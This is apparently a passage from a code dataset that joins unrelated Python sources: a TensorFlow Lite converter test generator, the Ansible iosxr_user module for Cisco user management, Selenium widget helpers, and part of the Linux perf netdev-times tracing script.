from tensorflow.lite.experimental.mlir.testing.op_tests.batchmatmul import make_batchmatmul_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.broadcast_args import make_broadcast_args_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.broadcast_gradient_args import make_broadcast_gradient_args_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.broadcast_to import make_broadcast_to_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.complex_abs import make_complex_abs_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.cond import make_cond_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.control_dep import make_control_dep_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.conv3d import make_conv3d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.conv3d_transpose import make_conv3d_transpose_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.conv_bias_activation import make_conv_bias_relu6_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.cumsum import make_cumsum_tests
# Placeholder for make_dense_image_warp_tests import
from tensorflow.lite.experimental.mlir.testing.op_tests.dynamic_rnn import make_dynamic_rnn_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.einsum import make_einsum_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.identify_dilated_conv import make_identify_dilated_conv_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.identify_dilated_conv1d import make_identify_dilated_conv1d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.imag import make_imag_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.irfft2d import make_irfft2d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.is_finite import make_is_finite_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.max_pool_with_argmax import make_max_pool_with_argmax_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.parse_example import make_parse_example_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.pool3d import make_avg_pool3d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.pool3d import make_max_pool3d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.real import make_real_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.reciprocal import make_reciprocal_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.rfft import make_rfft_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.rfft2d import make_rfft2d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.roll import make_roll_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.roll import make_roll_with_constant_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.segment_sum import make_segment_sum_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.shape_to_strided_slice import make_shape_to_strided_slice_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.softplus import make_softplus_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.static_hashtable import make_static_hashtable_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.static_rnn_with_control_flow_v2 import make_static_rnn_with_control_flow_v2_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.stft import make_stft_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_concat import make_tensor_list_concat_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_dynamic_shape import make_tensor_list_dynamic_shape_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_get_item import make_tensor_list_get_item_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_length import make_tensor_list_length_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_resize import make_tensor_list_resize_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_set_item import make_tensor_list_set_item_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_scatter_update import make_tensor_scatter_update_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.where_v2 import make_where_v2_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.while_loop import make_while_tests
from tensorflow.lite.testing import generate_examples_lib
# Maps a regex over generated test names to the tracking bug ID for test
# cases known to fail with the MLIR-based converter.
MLIR_CONVERTER_KNOWN_BUGS = {
    # We need to support dynamic_rnn case.
    r"unidirectional_sequence_rnn.*is_dynamic_rnn=True": "128997102",
    r"unidirectional_sequence_lstm.*is_dynamic_rnn=True": "128997102",
    # TODO(b/124314620): Test cases work with tf_tfl_translate binary
    # but not TFLiteConverter interface.
    # Concat & SpaceToDepth with uint8 doesn't work.
    r"concat.*type=tf\.uint8": "124314620",
    r"space_to_depth.*type=tf\.uint8": "124314620",
    r"l2norm.*fully_quantize=True": "134594898",
    # Below are not really a converter bug, but our kernels doesn't support
    # int64.
    r"div.*dtype=tf\.int64": "119126484",
    r"floor_div.*dtype=tf\.int64": "119126484",
    r"relu.*dtype=tf\.int64": "119126484",
    r"squared_difference.*dtype=tf\.int64": "119126484",
    # Post-training quantization support missing for below op in mlir.
    r"prelu.*fully_quantize=True": "156112683",
    # ResizeBilinear op kernel supports only float32 and quantized 8-bit
    # integers.
    r"resize_bilinear.*dtype=tf\.int32": "156569626",
}
# Disable GPU for now since we are just testing in TF against CPU reference
# value and creating non-device-specific graphs to export.
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"

parser = argparse.ArgumentParser(description="Script to generate TFLite tests.")
# Fixed: "Directory where the outputs will be go." -> "will go".
parser.add_argument("output_path",
                    help="Directory where the outputs will go.")
parser.add_argument(
    "--zip_to_output",
    type=str,
    help="Particular zip to output.",
    required=True)
parser.add_argument(
    "--known_bugs_are_errors",
    action="store_true",
    help=("If a particular model is affected by a known bug,"
          " count it as a converter error."))
# Fixed: the old help text ("Raise an exception if any converter error is
# encountered.") described the opposite of what this flag does.
parser.add_argument(
    "--ignore_converter_errors",
    action="store_true",
    help="Catch and report converter errors instead of raising an exception.")
parser.add_argument(
    "--save_graphdefs",
    action="store_true",
    help="Include intermediate graphdefs in the output zip files.")
parser.add_argument(
    "--run_with_flex",
    action="store_true",
    help="Whether the TFLite Flex converter is being used.")
parser.add_argument(
    "--make_edgetpu_tests",
    action="store_true",
    help="Whether to generate test cases for edgetpu.")
parser.add_argument(
    "--make_forward_compat_test",
    action="store_true",
    help="Make tests by setting TF forward compatibility horizon to the future")
parser.add_argument(
    "--test_sets",
    type=str,
    help=("Comma-separated list of test set names to generate. "
          "If not specified, a test set is selected by parsing the name of "
          "'zip_to_output' file."))
parser.add_argument(
    "--mlir_quantizer",
    action="store_true",
    help=("Whether the new MLIR quantizer is being used."))
def main(unused_args):
  """Translate the parsed FLAGS into converter options and run generation."""
  options = generate_examples_lib.Options()

  # Flags that map one-to-one onto identically named option fields.
  for flag_name in ("output_path", "zip_to_output", "known_bugs_are_errors",
                    "ignore_converter_errors", "save_graphdefs",
                    "run_with_flex", "make_edgetpu_tests",
                    "make_forward_compat_test", "mlir_quantizer"):
    setattr(options, flag_name, getattr(FLAGS, flag_name))

  # Fixed wiring for the MLIR-based conversion path.
  options.tflite_convert_function = mlir_convert.mlir_convert
  options.known_bugs = MLIR_CONVERTER_KNOWN_BUGS
  options.use_experimental_converter = True

  if FLAGS.test_sets:
    # Generate only the explicitly requested test sets.
    generate_examples_lib.generate_multi_set_examples(
        options, FLAGS.test_sets.split(","))
  else:
    generate_examples_lib.generate_examples(options)
if __name__ == "__main__":
  FLAGS, unparsed = parser.parse_known_args()

  if unparsed:
    # Fixed: the old call passed no value for the %s placeholder, so the
    # literal "%s" was printed instead of the program name.
    print("Usage: %s <path out> <zip file to generate>" % sys.argv[0])
    exit(1)
  else:
    tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
napkindrawing/ansible | lib/ansible/modules/network/iosxr/iosxr_user.py | 14 | 9858 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: iosxr_user
version_added: "2.4"
author: "Trishna Guha (@trishnag)"
short_description: Manage the collection of local users on Cisco IOS XR device
description:
- This module provides declarative management of the local usernames
configured on network devices. It allows playbooks to manage
either individual usernames or the collection of usernames in the
current running config. It also supports purging usernames from the
configuration that are not explicitly defined.
options:
users:
description:
- The set of username objects to be configured on the remote
Cisco IOS XR device. The list entries can either be the username
or a hash of username and properties. This argument is mutually
exclusive with the C(name) argument, alias C(collection).
name:
description:
- The username to be configured on the Cisco IOS XR device.
This argument accepts a string value and is mutually exclusive
with the C(collection) argument.
Please note that this option is not same as C(provider username).
password:
description:
- The password to be configured on the Cisco IOS XR device. The
password needs to be provided in clear and it will be encrypted
on the device.
Please note that this option is not same as C(provider password).
update_password:
description:
- Since passwords are encrypted in the device running config, this
argument will instruct the module when to change the password. When
set to C(always), the password will always be updated in the device
and when set to C(on_create) the password will be updated only if
the username is created.
default: always
choices: ['on_create', 'always']
group:
description:
- Configures the group for the username in the
device running configuration. The argument accepts a string value
defining the group name. This argument does not check if the group
has been configured on the device, alias C(role).
purge:
description:
- Instructs the module to consider the
resource definition absolute. It will remove any previously
configured usernames on the device with the exception of the
`admin` user (the current defined set of users).
type: bool
default: false
state:
description:
- Configures the state of the username definition
as it relates to the device operational configuration. When set
to I(present), the username(s) should be configured in the device active
configuration and when set to I(absent) the username(s) should not be
in the device active configuration
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: create a new user
iosxr_user:
name: ansible
password: test
state: present
- name: remove all users except admin
iosxr_user:
purge: yes
- name: set multiple users to group sys-admin
iosxr_user:
users:
- name: netop
- name: netend
group: sysadmin
state: present
- name: Change Password for User netop
iosxr_user:
name: netop
password: "{{ new_password }}"
update_password: always
state: present
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- username ansible secret password group sysadmin
- username admin secret admin
"""
import re
from functools import partial
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.iosxr import get_config, load_config
from ansible.module_utils.six import iteritems
from ansible.module_utils.iosxr import iosxr_argument_spec, check_args
def map_obj_to_commands(updates, module):
    """Translate (want, have) update pairs into IOS XR config commands.

    Each element of *updates* is a tuple of the desired user dict (want)
    and the corresponding on-device user dict (have; empty for new users).
    Returns the list of CLI commands needed to converge the device.
    """
    commands = list()
    update_password = module.params['update_password']
    # Removed dead local: ``state = module.params['state']`` was assigned
    # but never read (the per-user want['state'] is what matters).

    def needs_update(want, have, x):
        # True when the desired value is set and differs from the device.
        return want.get(x) and (want.get(x) != have.get(x))

    def add(command, want, x):
        command.append('username %s %s' % (want['name'], x))

    for update in updates:
        want, have = update
        if want['state'] == 'absent':
            commands.append('no username %s' % want['name'])
            continue
        if needs_update(want, have, 'group'):
            add(commands, want, 'group %s' % want['group'])
        if needs_update(want, have, 'password'):
            # Passwords are stored encrypted so they can never be diffed;
            # only push one when the policy is 'always' or the user is new.
            if update_password == 'always' or not have:
                add(commands, want, 'secret %s' % want['password'])
    return commands
def parse_group(data):
    """Extract the group name from a username config block, or None."""
    found = re.search(r'\n group (\S+)', data, re.M)
    return found.group(1) if found else None
def map_config_to_obj(module):
    """Read the device running config and return the configured users."""
    data = get_config(module, flags=['username'])
    usernames = re.findall(r'^username (\S+)', data, re.M)
    if not usernames:
        return list()
    instances = list()
    for user in set(usernames):
        # Collect every config line belonging to this username.
        cfg_block = '\n'.join(re.findall(r'username %s .+$' % user, data, re.M))
        instances.append({
            'name': user,
            'state': 'present',
            # Passwords are stored encrypted and cannot be read back.
            'password': None,
            'group': parse_group(cfg_block),
        })
    return instances
def get_param_value(key, item, module):
    """Resolve the effective value of *key* for one user entry.

    Falls back to the module-level parameter when the entry does not carry
    the key; otherwise type-checks the per-entry value against the argument
    spec. NOTE(review): the fallback triggers on any falsy value (e.g. empty
    string), not only a missing key -- confirm this is intended.
    """
    # if key doesn't exist in the item, get it from module.params
    if not item.get(key):
        value = module.params[key]
    # if key does exist, do a type check on it to validate it
    else:
        value_type = module.argument_spec[key].get('type', 'str')
        type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
        type_checker(item[key])
        value = item[key]
    # validate the param value (if validator func exists)
    # A module-level function named validate_<key> is looked up dynamically.
    validator = globals().get('validate_%s' % key)
    if all((value, validator)):
        validator(value, module)
    return value
def map_params_to_obj(module):
    """Normalise the ``users``/``name`` module parameters into user dicts."""
    users = module.params['users']
    name = module.params['name']

    if users:
        collection = []
        for entry in users:
            if not isinstance(entry, dict):
                # A bare string is shorthand for {'name': <string>}.
                collection.append({'name': entry})
            elif 'name' not in entry:
                module.fail_json(msg='name is required')
            else:
                collection.append(entry)
    elif name:
        collection = [{'name': name}]
    elif module.params['purge']:
        # Purge-only invocation: nothing to configure, only removals.
        return list()
    else:
        module.fail_json(msg='username is required')

    objects = []
    for entry in collection:
        fetch = partial(get_param_value, item=entry, module=module)
        entry['password'] = fetch('password')
        entry['group'] = fetch('group')
        entry['state'] = fetch('state')
        objects.append(entry)
    return objects
def update_objects(want, have):
    """Return (want, have) pairs for users that need configuration changes.

    A user is included when it does not yet exist on the device (state
    'present'), or when any desired attribute value differs from the
    device's current value.
    """
    updates = list()
    for entry in want:
        item = next((i for i in have if i['name'] == entry['name']), None)
        if item is None and entry['state'] == 'present':
            updates.append((entry, {}))
        elif item:
            # Append the pair at most once even when several keys differ;
            # the old per-key append duplicated the resulting command set.
            if any(value and value != item[key]
                   for key, value in entry.items()):
                updates.append((entry, item))
    return updates
def main():
    """ main entry point for module execution

    Builds the desired (want) and actual (have) user sets, derives the
    config commands to converge them, and applies them unless running in
    check mode.
    """
    argument_spec = dict(
        users=dict(type='list', aliases=['collection']),
        name=dict(),
        password=dict(no_log=True),
        update_password=dict(default='always', choices=['on_create', 'always']),
        group=dict(aliases=['role']),
        purge=dict(type='bool', default=False),
        state=dict(default='present', choices=['present', 'absent'])
    )
    argument_spec.update(iosxr_argument_spec)
    # 'name' (single user) and 'users' (list) are alternative spellings.
    mutually_exclusive = [('name', 'users')]
    module = AnsibleModule(argument_spec=argument_spec,
                           mutually_exclusive=mutually_exclusive,
                           supports_check_mode=True)
    warnings = list()
    check_args(module, warnings)
    result = {'changed': False}
    want = map_params_to_obj(module)
    have = map_config_to_obj(module)
    commands = map_obj_to_commands(update_objects(want, have), module)
    if module.params['purge']:
        # Remove every on-device user that is not desired, except 'admin'.
        want_users = [x['name'] for x in want]
        have_users = [x['name'] for x in have]
        for item in set(have_users).difference(want_users):
            if item != 'admin':
                commands.append('no username %s' % item)
    result['commands'] = commands
    result['warnings'] = warnings
    # Deleting admin can only come from an explicit state=absent request,
    # since the purge loop above already skips it.
    if 'no username admin' in commands:
        module.fail_json(msg='cannot delete the `admin` account')
    if commands:
        if not module.check_mode:
            load_config(module, commands, result['warnings'], commit=True)
        result['changed'] = True
    module.exit_json(**result)
if __name__ == '__main__':
    main()
| gpl-3.0 |
lowitty/selenium | com/ericsson/xn/commons/funcutils.py | 1 | 2749 | # -*- coding: utf-8 -*-
from time import sleep
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import StaleElementReferenceException
def find_single_widget(driver, wait_time, list_identifier):
    """Wait up to wait_time seconds for the element located by
    list_identifier to be present in the DOM, then return it."""
    waiter = WebDriverWait(driver, wait_time)
    return waiter.until(EC.presence_of_element_located(list_identifier))
def find_all_widgets(driver, wait_time, list_identifier):
    """Wait up to wait_time seconds until at least one element located by
    list_identifier is present, then return all matching elements."""
    condition = EC.presence_of_all_elements_located(list_identifier)
    return WebDriverWait(driver, wait_time).until(condition)
def wait_until_text_shown_up(driver, wait_time, list_identifier, text):
    """Wait up to wait_time seconds until *text* appears in the value
    attribute of the element located by list_identifier."""
    condition = EC.text_to_be_present_in_element_value(list_identifier, text)
    return WebDriverWait(driver, wait_time).until(condition)
def get_widget_ignore_refrence_error(driver, list_identifier, sleep_time=.5, wait_time=10):
    """Locate a widget, retrying once if the DOM node went stale mid-wait.

    (Name kept as-is, typo included, for backward compatibility.)
    """
    locator = EC.presence_of_element_located(list_identifier)
    try:
        return WebDriverWait(driver, wait_time).until(locator)
    except StaleElementReferenceException:
        # The widget was destroyed and re-created; a short pause lets the
        # rebuild finish before the second (and final) attempt.
        sleep(sleep_time)
        return WebDriverWait(driver, wait_time).until(locator)
def is_pair_nes(ne, cne):
    """Return True when ne and cne form a known paired NE combination.

    The recognised (order-independent) pairs are MME/SGSN, SGW/PGW and
    LTEHSS/IMSHSS; identical types never pair.
    """
    paired = (
        frozenset(('MME', 'SGSN')),
        frozenset(('SGW', 'PGW')),
        frozenset(('LTEHSS', 'IMSHSS')),
    )
    return ne != cne and frozenset((ne, cne)) in paired
def ne_type_index_add_ne_page(ne_type):
    """Return the 1-based row index of *ne_type* on the add-NE page.

    Returns None for unknown types.
    """
    indexes = {
        "3GSGSN": 1,
        "GGSN": 2,
        "HLR": 3,
        "IMSHSS": 4,
        "LTEHSS": 5,
        "MME": 6,
        "MSC": 7,
        "MTAS": 8,
        "OCGAS": 9,
        "PCSCF": 10,
        "SGW": 11,
        "PGW": 12,
        "SBC": 13,
        "SGSN": 14
    }
    # dict.get replaces the deprecated Python-2-only has_key() and avoids
    # the double lookup; unknown types yield None exactly as before.
    return indexes.get(ne_type)
def ne_category_by_ne_type(ne_type):
    """Map an NE type name to its network category ('3G', '4G' or 'IMS').

    Raises KeyError for unknown types, like the original dict lookup.
    """
    for category, types in (('3G', ('SGSN',)),
                            ('4G', ('SGW', 'PGW', 'MME', 'LTEHSS')),
                            ('IMS', ('SBC', 'OCGAS', 'IMSHSS'))):
        if ne_type in types:
            return category
    raise KeyError(ne_type)
"""
def wait_until_text_is_not_none(widget, timeout, interval=.25):
end_time = datetime.now() + timedelta(seconds=timeout)
while datetime.now() < end_time:
text = widget.get_attribute('innerHTML').encode('utf-8').strip()
if not '' == text:
return text
time.sleep(interval)
return None
"""
| mit |
munoz0raul/linux-toradex_ACM_iMX6 | tools/perf/scripts/python/netdev-times.py | 11271 | 15048 | # Display a process of packets and processed time.
# It helps us to investigate networking or network device.
#
# options
# tx: show only tx chart
# rx: show only rx chart
# dev=: show only thing related to specified device
# debug: work with debug mode. It shows buffer status.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
# --- Module-level state shared by the perf trace callbacks below ---
all_event_list = []; # every tracepoint event handled by this script
irq_dic = {}; # key: cpu, value: stack of irq records that raise NET_RX softirq
net_rx_dic = {}; # key: cpu, value: NET_RX softirq entry time plus received events
receive_hunk_list = []; # completed receive sequences, ready for display
rx_skb_list = []; # received packets awaiting a matching skb_copy_datagram_iovec
buffer_budget = 65536; # capacity of rx_skb_list, tx_queue_list and tx_xmit_list
of_count_rx_skb_list = 0; # overflow count
tx_queue_list = []; # packets which passed through dev_queue_xmit
of_count_tx_queue_list = 0; # overflow count
tx_xmit_list = []; # packets which passed through dev_hard_start_xmit
of_count_tx_xmit_list = 0; # overflow count
tx_free_list = []; # packets which have been freed
# command-line options (parsed in trace_begin)
show_tx = 0;
show_rx = 0;
dev = 0; # name of the device specified by option "dev="
debug = 0;
# indices of event_info tuple
EINFO_IDX_NAME= 0
EINFO_IDX_CONTEXT=1
EINFO_IDX_CPU= 2
EINFO_IDX_TIME= 3
EINFO_IDX_PID= 4
EINFO_IDX_COMM= 5
# Convert a nanosecond interval into milliseconds.
def diff_msec(src, dst):
    delta_nsec = dst - src
    return delta_nsec / 1000000.0
# Display a process of transmitting a packet
def print_transmit(hunk):
    # Honour the "dev=" filter: skip packets sent via other devices.
    if dev != 0 and hunk['dev'].find(dev) < 0:
        return
    # Columns: device, length, queue timestamp, time in Qdisc, time on NIC.
    print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \
        (hunk['dev'], hunk['len'],
        nsecs_secs(hunk['queue_t']),
        nsecs_nsecs(hunk['queue_t'])/1000,
        diff_msec(hunk['queue_t'], hunk['xmit_t']),
        diff_msec(hunk['xmit_t'], hunk['free_t']))
# Format for displaying rx packet processing.
# These templates are filled in by print_receive() below; the JOINT
# strings draw the vertical connectors of the ASCII-art timeline.
PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)"
PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)"
PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)"
PF_JOINT= " |"
PF_WJOINT= " | |"
PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)"
PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)"
PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)"
PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)"
PF_CONS_SKB= " | consume_skb(+%.3fmsec)"
# Display a process of received packets and interrupts associated with
# a NET_RX softirq
def print_receive(hunk):
    # A "hunk" bundles the irqs that raised one NET_RX softirq with the
    # packet events processed inside it.
    show_hunk = 0
    irq_list = hunk['irq_list']
    cpu = irq_list[0]['cpu']
    base_t = irq_list[0]['irq_ent_t']
    # check if this hunk should be showed (honour the "dev=" filter)
    if dev != 0:
        for i in range(len(irq_list)):
            if irq_list[i]['name'].find(dev) >= 0:
                show_hunk = 1
                break
    else:
        show_hunk = 1
    if show_hunk == 0:
        return
    # Header: absolute time of the first irq entry plus the CPU.
    print "%d.%06dsec cpu=%d" % \
        (nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu)
    # First, every hard irq and any netif_rx it performed.
    for i in range(len(irq_list)):
        print PF_IRQ_ENTRY % \
            (diff_msec(base_t, irq_list[i]['irq_ent_t']),
            irq_list[i]['irq'], irq_list[i]['name'])
        print PF_JOINT
        irq_event_list = irq_list[i]['event_list']
        for j in range(len(irq_event_list)):
            irq_event = irq_event_list[j]
            if irq_event['event'] == 'netif_rx':
                print PF_NET_RX % \
                    (diff_msec(base_t, irq_event['time']),
                    irq_event['skbaddr'])
                print PF_JOINT
    # Then the NET_RX softirq entry and everything processed within it.
    print PF_SOFT_ENTRY % \
        diff_msec(base_t, hunk['sirq_ent_t'])
    print PF_JOINT
    event_list = hunk['event_list']
    for i in range(len(event_list)):
        event = event_list[i]
        if event['event_name'] == 'napi_poll':
            print PF_NAPI_POLL % \
                (diff_msec(base_t, event['event_t']), event['dev'])
            # The last event closes the timeline with a blank line.
            if i == len(event_list) - 1:
                print ""
            else:
                print PF_JOINT
        else:
            print PF_NET_RECV % \
                (diff_msec(base_t, event['event_t']), event['skbaddr'],
                event['len'])
            # 'comm' marks delivery to a process; 'handle' marks an skb free.
            if 'comm' in event.keys():
                print PF_WJOINT
                print PF_CPY_DGRAM % \
                    (diff_msec(base_t, event['comm_t']),
                    event['pid'], event['comm'])
            elif 'handle' in event.keys():
                print PF_WJOINT
                if event['handle'] == "kfree_skb":
                    print PF_KFREE_SKB % \
                        (diff_msec(base_t,
                        event['comm_t']),
                        event['location'])
                elif event['handle'] == "consume_skb":
                    print PF_CONS_SKB % \
                        diff_msec(base_t,
                        event['comm_t'])
            print PF_JOINT
def trace_begin():
    """Parse script arguments: 'tx', 'rx', 'dev=<name>' and 'debug'.

    Defaults to showing both tx and rx charts when neither is requested.
    """
    global show_tx
    global show_rx
    global dev
    global debug
    for arg in sys.argv[1:]:
        if arg == 'tx':
            show_tx = 1
        elif arg == 'rx':
            show_rx = 1
        elif arg.startswith('dev='):
            dev = arg[4:]
        elif arg == 'debug':
            debug = 1
    if show_tx == 0 and show_rx == 0:
        show_tx = 1
        show_rx = 1
def trace_end():
    """Dispatch all queued events to their handlers, then print the charts."""
    # order all events in time
    all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME],
                                        b[EINFO_IDX_TIME]))
    # process all events
    for i in range(len(all_event_list)):
        event_info = all_event_list[i]
        name = event_info[EINFO_IDX_NAME]
        if name == 'irq__softirq_exit':
            handle_irq_softirq_exit(event_info)
        elif name == 'irq__softirq_entry':
            handle_irq_softirq_entry(event_info)
        elif name == 'irq__softirq_raise':
            handle_irq_softirq_raise(event_info)
        elif name == 'irq__irq_handler_entry':
            handle_irq_handler_entry(event_info)
        elif name == 'irq__irq_handler_exit':
            handle_irq_handler_exit(event_info)
        elif name == 'napi__napi_poll':
            handle_napi_poll(event_info)
        elif name == 'net__netif_receive_skb':
            handle_netif_receive_skb(event_info)
        elif name == 'net__netif_rx':
            handle_netif_rx(event_info)
        elif name == 'skb__skb_copy_datagram_iovec':
            handle_skb_copy_datagram_iovec(event_info)
        elif name == 'net__net_dev_queue':
            handle_net_dev_queue(event_info)
        elif name == 'net__net_dev_xmit':
            handle_net_dev_xmit(event_info)
        elif name == 'skb__kfree_skb':
            handle_kfree_skb(event_info)
        elif name == 'skb__consume_skb':
            handle_consume_skb(event_info)
    # display receive hunks
    if show_rx:
        for i in range(len(receive_hunk_list)):
            print_receive(receive_hunk_list[i])
    # display transmit hunks
    if show_tx:
        print " dev len Qdisc " \
            " netdevice free"
        for i in range(len(tx_free_list)):
            print_transmit(tx_free_list[i])
    if debug:
        # dump internal buffer accounting (see buffer_budget above)
        print "debug buffer status"
        print "----------------------------"
        print "xmit Qdisc:remain:%d overflow:%d" % \
            (len(tx_queue_list), of_count_tx_queue_list)
        print "xmit netdevice:remain:%d overflow:%d" % \
            (len(tx_xmit_list), of_count_tx_xmit_list)
        print "receive:remain:%d overflow:%d" % \
            (len(rx_skb_list), of_count_rx_skb_list)
# Tracepoint callbacks, invoked directly by perf when it decodes an event.
# Each one packs its arguments into an event_info tuple and queues it on
# all_event_list for trace_end() to process in timestamp order.  The three
# softirq callbacks only record NET_RX softirqs.
# NOTE(review): the exit/raise filters look up symbols via the
# "irq__softirq_entry" table, as in the original code.
def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec):
    if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
        return
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm, vec))
def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec):
    if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
        return
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm, vec))
def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec):
    if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
        return
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm, vec))
def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm,
                           irq, irq_name):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           irq, irq_name))
def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           irq, ret))
def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           napi, dev_name))
def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr,
                           skblen, dev_name):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr, skblen, dev_name))
def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr,
                  skblen, dev_name):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr, skblen, dev_name))
def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm,
                       skbaddr, skblen, dev_name):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr, skblen, dev_name))
def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm,
                      skbaddr, skblen, rc, dev_name):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr, skblen, rc, dev_name))
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
                   skbaddr, protocol, location):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr, protocol, location))
def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr))
def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm,
                                 skbaddr, skblen):
    all_event_list.append((name, context, cpu, nsecs(sec, nsec), pid, comm,
                           skbaddr, skblen))
def handle_irq_handler_entry(event_info):
	# Open a per-cpu hard-irq record; paired with handle_irq_handler_exit.
	(name, context, cpu, time, pid, comm, irq, irq_name) = event_info
	irq_dic.setdefault(cpu, []).append(
		{'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time})
def handle_irq_handler_exit(event_info):
	# Close the per-cpu hard-irq record opened by handle_irq_handler_entry.
	# The record is kept only if a NET_RX softirq was raised inside the
	# handler (an 'event_list' was attached); otherwise it is dropped.
	(name, context, cpu, time, pid, comm, irq, ret) = event_info
	# Bug fix: also guard against an empty per-cpu list (e.g. tracing
	# started in the middle of a handler); .pop() on an empty list would
	# raise IndexError.  Mirrors the check in handle_irq_softirq_raise.
	if cpu not in irq_dic.keys() \
	or len(irq_dic[cpu]) == 0:
		return
	irq_record = irq_dic[cpu].pop()
	if irq != irq_record['irq']:
		return
	irq_record.update({'irq_ext_t':time})
